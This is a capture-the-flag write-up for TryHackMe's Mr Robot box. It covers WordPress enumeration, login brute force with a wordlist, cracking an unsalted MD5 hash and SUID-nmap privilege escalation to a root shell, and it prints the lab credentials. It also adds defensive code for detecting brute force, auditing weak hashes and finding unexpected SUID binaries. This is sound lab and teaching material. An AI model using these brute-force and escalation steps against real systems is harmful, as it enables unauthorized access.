TryHackMe - Mr Robot CTF (Medium)

Information Gathering

Target: 10.10.46.34

nmap -sC -sV $ip -p- --open
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a8:12:06:7f:7f:b9:ef:fc:42:5a:91:ed:39:af:2f:ac (RSA)
|   256 0e:8e:1e:2c:54:0c:36:c8:48:28:1f:d9:73:54:3d:78 (ECDSA)
|_  256 1c:92:7d:ae:72:78:45:1e:ca:ba:9e:80:63:79:6e:b8 (ED25519)
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

Mr. Robot themed website with a terminal-style web interface.

A vhost scan appears to have made the web server stop responding.

Navigating to a random non-existent page reveals it is a WordPress site.

<script src="http://10.10.141.129/wp-content/themes/twentyfifteen/js/html5.js"></script>

We can also see it is using the twentyfifteen theme: https://github.com/WordPress/WordPress/tree/master/wp-content/themes/twentyfifteen

Navigating to robots.txt reveals

User-agent: *
fsocity.dic
key-1-of-3.txt

We get one of the keys and a .dic file. Googling the extension turns up "Disseminated intravascular coagulation", which is unlikely to be the intended path, so we can assume it is a user-defined dictionary file.

We can also see a WordPress login on the errant WordPress page. After running dirsearch, this and the wordlist are the only things of interest found.

fsocity.dic is a wordlist that almost certainly contains passwords and possibly also usernames.

Wordpress

wpscan
└─$ wpscan -e p --url https://10.10.141.129 --disable-tls-checks --no-banner --plugins-detection passive -t 100
[i] Updating the Database ...
[i] Update completed.

[+] URL: https://10.10.141.129/ [10.10.141.129]
[+] Started: Mon Aug 18 07:26:00 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Mod-Pagespeed: 1.9.32.3-4523
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: https://10.10.141.129/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://10.10.141.129/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] The external WP-Cron seems to be enabled: https://10.10.141.129/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - https://10.10.141.129/793bc52.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - https://10.10.141.129/793bc52.html, Match: 'WordPress 4.3.1'

[+] WordPress theme in use: twentyfifteen
 | Location: https://10.10.141.129/wp-content/themes/twentyfifteen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: https://10.10.141.129/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 4.0
 | Style URL: https://10.10.141.129/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteens simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.141.129/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Aug 18 07:26:04 2025
[+] Requests Done: 49
[+] Cached Requests: 6
[+] Data Sent: 10.562 KB
[+] Data Received: 22.494 MB
[+] Memory used: 277.172 MB
[+] Elapsed time: 00:00:03

Twentyfifteen theme exploit research:
https://wpscan.com/vulnerability/2499b30a-4bcc-462a-935e-1fe4664b95d5/
The theme seems quite secure; the only finding is an XSS vulnerability.

Initial Access

Possible approaches:

  1. Brute force the WordPress login
  2. Find a new exploit in the twentyfifteen theme

WordPress login brute force

We first need usernames. From the website we can gather:
mrrobot
user
root

Using wpscan to enumerate users is also possible:
└─$ wpscan --url http://10.10.141.129 --enumerate u
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==================================> (10 / 10) 100.00% Time: 00:00:00
It does not find any, however.

This does not give us access. However, it shows that WordPress returns "Invalid username" in the response, allowing users to be enumerated via brute force.

Using Caido to brute force the login

User enumeration

Deduplicating fsocity.dic results in a significantly smaller file.

└─$ wc -l fsocity.dic                              
11451 fsocity.dic

Forwarding the login request to the Automate tab in Caido, then filtering the responses for the string "Invalid username" using Caido's query language (HTTPQL):

resp.raw.ncont:"Invalid username"

This yields the valid username elliot.

Password enumeration

Doing the same thing with the password field and a different query string results in valid login credentials: elliot:ER28-0652
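The user and password enumeration above generates thousands of POSTs to wp-login.php from one source in a short time, which is exactly what a defender can alert on. The detector below is an added example, not part of the original writeup: it parses Apache combined-format access log lines with a hypothetical parser, keeps a sliding window of POSTs per source IP to the login and XML-RPC endpoints the scan surfaced, and flags sources that exceed a threshold; the sample log lines, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log format (hypothetical parser written for this example).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# The two endpoints the writeup shows being hammered: the login form and XML-RPC.
WATCHED = {"/wp-login.php", "/xmlrpc.php"}

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"],
            m["path"].split("?", 1)[0], int(m["status"]))

def flag_login_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Return {ip: total POSTs} for each source that POSTs to a watched endpoint
    more than `threshold` times within any `window`-long span (sliding window)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] in WATCHED:
            per_ip[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window's left edge forward
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(stamps)
                break
    return flagged

# Constructed sample log: one source replaying a dictionary against wp-login.php (25 POSTs
# in 25 s, each answered 200 as the form re-renders) beside one benign login redirected 302.
SAMPLE = [f'10.10.14.5 - - [18/Aug/2025:07:30:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3123'
          for i in range(25)] + [
    '10.10.14.9 - - [18/Aug/2025:07:30:10 +0000] "GET /robots.txt HTTP/1.1" 200 41',
    '10.10.14.9 - - [18/Aug/2025:07:30:11 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    print(flag_login_bruteforce(SAMPLE))  # {'10.10.14.5': 25}
```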

System Enumeration

On the system we can access robot's home directory and find a password file containing an MD5 hash, which can be cracked easily with CrackStation.

cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
crackstation > abcdefghijklmnopqrstuvwxyz
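Why the file above is an instant finding: it stores an unsalted, fast MD5, so a single table of candidate digests matches every user at once. The audit below is an added example, not part of the original writeup: it parses the `user:hash` layout of password.raw-md5, checks each entry against a constructed list of weak candidates (the writeup's hash matches the lowercase alphabet), and contrasts it with a salted PBKDF2 hash where the same check cannot be precomputed. The candidate list and the PBKDF2 storage format are assumptions for this example.

```python
import hashlib
import hmac
import os

def parse_raw_md5(text):
    """Parse `user:md5hex` lines, the layout of the writeup's password.raw-md5 file."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if ":" in line:
            user, digest = line.split(":", 1)
            entries[user] = digest.lower()
    return entries

def audit_raw_md5(entries, candidates):
    """Return {user: candidate} for every entry whose unsalted MD5 matches a weak candidate.
    MD5 is deterministic and unsalted here, so one table of digests serves all users."""
    table = {hashlib.md5(c.encode()).hexdigest(): c for c in candidates}
    return {user: table[d] for user, d in entries.items() if d in table}

def hash_password(password, salt=None, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256 (constructed `pbkdf2:iters:salt:dk` format). A random
    salt defeats precomputed tables; the iteration count makes each guess expensive."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2:{iterations}:{salt.hex()}:{dk.hex()}"

def verify_password(stored, password):
    """Recompute the PBKDF2 digest with the stored salt and compare in constant time."""
    _, iters, salt_hex, dk_hex = stored.split(":")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

# Constructed input: the line from the writeup plus a short list of weak candidates.
PASSWORD_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"
CANDIDATES = ["password", "123456", "abcdefghijklmnopqrstuvwxyz", "qwerty"]

if __name__ == "__main__":
    print(audit_raw_md5(parse_raw_md5(PASSWORD_FILE), CANDIDATES))  # {'robot': 'abcdefghijklmnopqrstuvwxyz'}
```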

After using SSH to authenticate as the robot user and get a shell, we have a stable user.

It appears we cannot run sudo on the machine as the robot user.

LinPEAS finds the SUID bit set on nmap:

-rwsr-xr-x 1 root root 17K Jun  2 18:23 /usr/local/bin/nmap

Vulnerability Assessment

GTFOBins shows ways to exploit this for privilege escalation. The standard way is with sudo, running it with the --interactive flag. sudo is not available here, however; simply running this SUID binary (./nmap) launches it in elevated-privilege interactive mode.
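A setuid-root nmap in /usr/local/bin is the kind of finding a periodic host audit should surface before LinPEAS does. The check below is an added defender-side example, not part of the original writeup: it walks the given directories, reports regular files with the setuid bit set that are not on a known-good allowlist, and by default limits the report to root-owned files, which are the ones that hand out root when abused. The allowlist contents and directory roots are assumptions for this example.

```python
import os
import stat

# Setuid-root binaries a stock system is expected to carry (constructed allowlist; a real
# baseline would come from a known-good host or the package manager's file lists).
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount", "/usr/bin/umount",
}

def find_unexpected_suid(roots, allowlist=EXPECTED_SUID, root_only=True):
    """Walk `roots` and return sorted paths of regular files with the setuid bit set
    that are not on `allowlist`. With root_only=True only uid-0 owned files are
    reported (the writeup's /usr/local/bin/nmap is owned by root)."""
    found = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: do not follow symlinks
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                    continue
                if root_only and st.st_uid != 0:
                    continue
                if path not in allowlist:
                    found.append(path)
    return sorted(found)

if __name__ == "__main__":
    for p in find_unexpected_suid(["/usr/local/bin", "/usr/bin", "/bin"]):
        print("unexpected setuid binary:", p)
```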

Privilege Escalation

Now in the elevated nmap interactive mode:

nmap> !sh

This results in a root shell and concludes the box.

